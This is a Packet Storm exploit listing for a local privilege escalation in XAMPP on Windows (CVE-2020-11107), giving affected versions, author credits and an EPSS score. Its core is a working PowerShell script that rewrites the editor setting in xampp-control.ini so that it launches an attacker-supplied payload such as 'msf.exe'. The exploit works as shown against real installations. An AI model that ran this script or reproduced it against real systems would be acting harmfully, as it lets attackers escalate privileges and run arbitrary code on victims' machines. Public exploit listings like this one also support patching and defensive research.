Lucene search

K
packetstormSalman AsadPACKETSTORM:164292
HistorySep 27, 2021 - 12:00 a.m.

XAMPP 7.4.3 Privilege Escalation

2021-09-2700:00:00
Salman Asad
packetstormsecurity.com
309

0.006 Low

EPSS

Percentile

77.8%

`# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation  
# Exploit Author: Salman Asad (@deathflash1411, [email protected])  
# Original Author: Maximilian Barz (@S1lkys)  
# Date: 27/09/2021  
# Vendor Homepage: https://www.apachefriends.org  
# Version: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4  
# Tested on: Windows 10 + XAMPP 7.3.10  
# References: https://github.com/S1lkys/CVE-2020-11107  
  
$file = "C:\xampp\xampp-control.ini"  
$find = ((Get-Content $file)[2] -Split "=")[1]  
# Insert your payload path here  
$replace = "C:\temp\msf.exe"  
(Get-Content $file) -replace $find, $replace | Set-Content $file  
`

0.006 Low

EPSS

Percentile

77.8%

Related for PACKETSTORM:164292